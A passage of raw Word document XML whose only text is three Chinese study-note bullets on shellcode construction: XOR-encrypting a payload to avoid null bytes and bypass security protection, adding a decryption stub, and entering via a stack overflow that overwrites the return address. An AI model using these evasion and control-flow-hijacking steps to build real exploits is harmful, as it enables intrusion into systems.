    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为了避免坏字符（如0x00），同时绕过安全防护，进行加密（可以使用异或加密）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>添加解密代码对应的2进制机器码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="840" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>提供入口，例如使用栈覆盖，给返回地址赋新值。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onsola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B91C39"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DAB91C39"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="2E069975"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2E06997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0D5312"/>
    <w:rsid w:val="5CBC137E"/>
    <w:rsid w:val="6EF06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2023-03-27T06:01:00Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>哈哈哈哈</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-27T17:00:33Z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